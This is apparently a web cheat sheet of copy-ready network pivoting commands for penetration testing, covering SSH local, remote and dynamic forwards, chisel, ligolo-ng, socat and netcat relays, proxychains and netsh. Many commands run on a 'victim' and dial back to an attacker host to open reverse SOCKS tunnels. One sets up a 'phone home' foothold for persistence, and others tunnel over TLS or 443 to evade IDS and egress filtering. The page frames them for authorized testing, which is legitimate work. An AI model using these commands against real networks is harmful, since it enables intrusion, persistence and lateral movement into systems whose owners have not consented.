Pivoting & Port Forwarding Cheat Sheet

Network pivoting and tunneling reference: SSH local/remote/dynamic port forwarding, chisel, ligolo-ng, socat relays, proxychains, and SOCKS to reach segmented internal networks. (44 payloads)

Try it interactively with the Network Recon & Exploitation

SSH Local Forward (-L)

(6)

ssh -L 8080:127.0.0.1:80 user@pivot

Bind local 8080 → pivot's own localhost:80. Reach a service the target only listens for on loopback.Local forward: traffic enters YOUR machine, exits at the SSH server.

ssh -L 3306:10.10.10.5:3306 user@pivot

Bind local 3306 → 10.10.10.5:3306 routed through the pivot. Hit a DB on a host only the pivot can see.The destination is resolved from the SSH server's perspective.

ssh -L 0.0.0.0:8080:10.10.10.5:80 user@pivot

Listen on all interfaces so teammates/tools on your LAN can use the forward (needs GatewayPorts or default behaviour).Default sshd only allows remote bind if GatewayPorts yes/clientspecified.

ssh -N -f -L 445:10.10.10.5:445 user@pivot

-N (no shell) -f (background) — set up the forward and detach. Ideal for tooling like smbclient/CME.-N keeps the channel open without spawning a command.

ssh -L 8443:internal.corp:443 -L 5985:dc01:5985 user@pivot

Chain multiple -L flags in one session to expose several internal services at once.

smbclient -L //127.0.0.1 -p 445 -U user

Use the local forward: tools target 127.0.0.1:<localport>, traffic tunnels to the internal host.

SSH Remote Forward (-R)

(6)

ssh -R 9001:127.0.0.1:9001 user@attacker

Bind 9001 on the attacker box → back to a service on the compromised host's loopback. Pull a victim-side service out.Remote forward: the listener opens on the SSH SERVER (attacker).

ssh -R 8888:10.10.10.5:80 user@attacker

Expose an internal host (reachable from the victim) on the attacker at 127.0.0.1:8888.Classic when outbound SSH from the victim is allowed but inbound is blocked.

ssh -R 1080 user@attacker

Remote dynamic forward — opens a SOCKS proxy on the attacker that egresses from the victim's network (OpenSSH 7.6+).Reverse SOCKS without any extra tooling — use with proxychains.

ssh -N -R 0.0.0.0:3389:10.10.10.5:3389 user@attacker

Expose internal RDP on all attacker interfaces (requires GatewayPorts yes in the attacker's sshd_config).Edit /etc/ssh/sshd_config on the attacker, then restart sshd.

ssh -R 2222:127.0.0.1:22 user@attacker

Phone home so the attacker can SSH back into the victim via the attacker's localhost:2222 (persistence/foothold).

GatewayPorts yes

sshd_config directive on the listening end — required to bind -R/-D forwards on non-loopback interfaces.

SSH Dynamic / SOCKS (-D)

(6)

ssh -D 1080 user@pivot

Open a SOCKS4/5 proxy on local 1080. Every connection through it egresses from the pivot — instant subnet access.The single most useful pivot primitive: dynamic = SOCKS.

ssh -N -D 0.0.0.0:1080 user@pivot

SOCKS bound on all interfaces (no shell) for team use; combine with proxychains/Burp upstream proxy.

ssh -D 1080 -J jumphost user@pivot

-J chains through a jump host first, then opens SOCKS from the deeper pivot. Multi-hop without nested SSH.ProxyJump (-J) replaces fragile -t ssh ... ssh chains.

proxychains nmap -sT -Pn -n 10.10.10.0/24

Run a TCP-connect scan across the internal subnet through the SOCKS proxy (SOCKS can't carry SYN/UDP/ICMP).Always -sT -Pn over SOCKS; -sS and ping won't traverse it.

proxychains crackmapexec smb 10.10.10.0/24

Spray/enumerate SMB internally through the dynamic forward.

curl --socks5-hostname 127.0.0.1:1080 http://internal/

Native SOCKS support in curl — resolve DNS on the proxy side (-hostname) to avoid DNS leaks.

chisel (Reverse SOCKS & Forwards)

(6)

chisel server -p 8080 --reverse # attacker

Start the reverse tunnel server on the attacker. Required for clients to push tunnels back.Single static Go binary — drop it anywhere, no deps.

chisel client 10.10.14.2:8080 R:socks # victim

Victim connects out and exposes a SOCKS5 proxy on the attacker's localhost:1080.Best when the victim has no inbound but allows outbound 8080/443.

chisel client 10.10.14.2:8080 R:3389:10.10.10.5:3389

Reverse single-port forward — surface an internal RDP host on the attacker's port 3389.

chisel client 10.10.14.2:8080 R:8000:127.0.0.1:8000

Expose a service bound to the victim's loopback on the attacker's port 8000.

chisel server -p 443 --reverse --tls-domain x.com

Run over 443 with a Let's Encrypt cert so the tunnel blends into HTTPS egress.

chisel client --auth user:pass --keepalive 25s host:8080 R:socks

Authenticated client with keepalive so idle NAT/firewall states don't drop the tunnel.

ligolo-ng (TUN Interface)

(7)

sudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up

Create the ligolo TUN interface on the attacker once before starting the proxy.ligolo routes via a real interface — no proxychains, full TCP/UDP/ICMP.

./proxy -selfcert -laddr 0.0.0.0:11601 # attacker

Start the ligolo-ng proxy/listener with a self-signed cert on the attacker.

./agent -connect 10.10.14.2:11601 -ignore-cert # victim

Run the agent on the victim; it dials back and registers a session in the proxy console.

session → start

In the proxy console pick the agent session, then 'start' to bring the tunnel up.Run 'ifconfig'/'autoroute' inside the session to enumerate reachable subnets.

sudo ip route add 10.10.10.0/24 dev ligolo

Route the internal subnet through the TUN — now nmap -sS, ping, and any tool just work.This is why ligolo beats SOCKS: native routing, no -sT limitation.

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444

Agent-side listener: forward a victim-network port back to the attacker (e.g. catch a reverse shell from deeper hosts).

sudo ip route add 240.0.0.1/32 dev ligolo

Use ligolo's magic 240.0.0.1 to reach services on the agent host's own loopback (127.0.0.1).

socat / netcat Relays

(6)

socat TCP-LISTEN:8080,fork,reuseaddr TCP:10.10.10.5:80

Plain port relay: listen on 8080, forward each connection to an internal host. Quick single-port pivot.fork handles concurrent connections; reuseaddr avoids TIME_WAIT bind errors.

socat TCP-LISTEN:9001,fork TCP:127.0.0.1:9001 &

Loopback relay to redirect a reverse shell that can only reach the pivot's localhost.

socat TCP-LISTEN:443,fork,reuseaddr OPENSSL:attacker:443,verify=0

Encrypt a relay leg with TLS to evade plaintext IDS inspection on the wire.

socat TCP-LISTEN:1080,fork SOCKS4A:127.0.0.1:%h:%p,socksport=9050

Bridge a non-SOCKS-aware tool onto an existing SOCKS proxy (here Tor/SSH on 9050).

mknod /tmp/f p; nc -lvp 8080 < /tmp/f | nc 10.10.10.5 80 > /tmp/f

FIFO-backed netcat relay when socat isn't on the box — bidirectional single-port forward.Fallback for minimal environments; one connection at a time.

rinetd / portfwd (Meterpreter)

On Windows pivots, Meterpreter's 'portfwd add -l 3389 -p 3389 -r 10.10.10.5' gives a clean local forward without dropping binaries.

proxychains, sshuttle & Helpers

(7)

socks5 127.0.0.1 1080

Add this line under [ProxyList] in /etc/proxychains4.conf to point at your SSH/chisel SOCKS proxy.Use socks5 (not socks4) so remote DNS works.

proxy_dns

Enable in proxychains4.conf to resolve hostnames through the proxy and prevent DNS leaks revealing your targets.

dynamic_chain

Set in proxychains4.conf to skip dead proxies in a multi-hop chain (vs strict_chain which fails if any is down).

proxychains4 -f ./pc-hop2.conf nmap -sT -Pn 172.16.0.0/24

-f loads a per-hop config so you can manage stacked SOCKS proxies (double pivot) cleanly.

sshuttle -r user@pivot 10.10.10.0/24

Transparent 'poor-man's VPN' over SSH — routes a whole subnet, no proxychains, supports DNS with --dns.Needs Python on the pivot; far smoother than per-tool SOCKS wrapping.

plink.exe -R 1080 -l user -pw pass attacker

PuTTY's CLI for reverse forwards from Windows victims without OpenSSH installed.

netsh interface portproxy add v4tov4 listenport=3389 connectaddress=10.10.10.5 connectport=3389

Native Windows port forward via netsh — survives without uploading any tooling.Remove with 'netsh interface portproxy reset'.

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Linux Privilege Escalation Cheat Sheet Post-Exploitation Cheat Sheet Active Directory & Kerberos Cheat Sheet Chisel Tunneling & Pivoting Cheatsheet

Frequently asked questions

What is the Pivoting & Port Forwarding Cheat Sheet?+

It's a quick-reference collection of 44 Pivoting payloads for testing Pivoting & Port Forwarding vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Pivoting payloads?+

Copy any payload straight into your authorized test, or use the Network Recon & Exploitation to apply them interactively. Only test systems you have explicit permission to assess.

Are these Pivoting payloads free to use?+

Yes — this cheat sheet and all Pivoting payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Pivoting & Port Forwarding Cheat Sheet?+

How do I use these Pivoting payloads?+

Copy any payload straight into your authorized test, or use the Network Recon & Exploitation to apply them interactively. Only test systems you have explicit permission to assess.

Are these Pivoting payloads free to use?+

Yes — this cheat sheet and all Pivoting payloads are completely free, with no account required. Everything runs in your browser.

Pivoting & Port Forwarding Cheat Sheet

SSH Local Forward (-L)

SSH Remote Forward (-R)

SSH Dynamic / SOCKS (-D)

chisel (Reverse SOCKS & Forwards)

ligolo-ng (TUN Interface)

socat / netcat Relays

proxychains, sshuttle & Helpers

Related Tools

Related Cheat Sheets

Frequently asked questions

Pivoting & Port Forwarding Cheat Sheet

SSH Local Forward (-L)

SSH Remote Forward (-R)

SSH Dynamic / SOCKS (-D)

chisel (Reverse SOCKS & Forwards)

ligolo-ng (TUN Interface)

socat / netcat Relays

proxychains, sshuttle & Helpers

Related Tools

Related Cheat Sheets

Frequently asked questions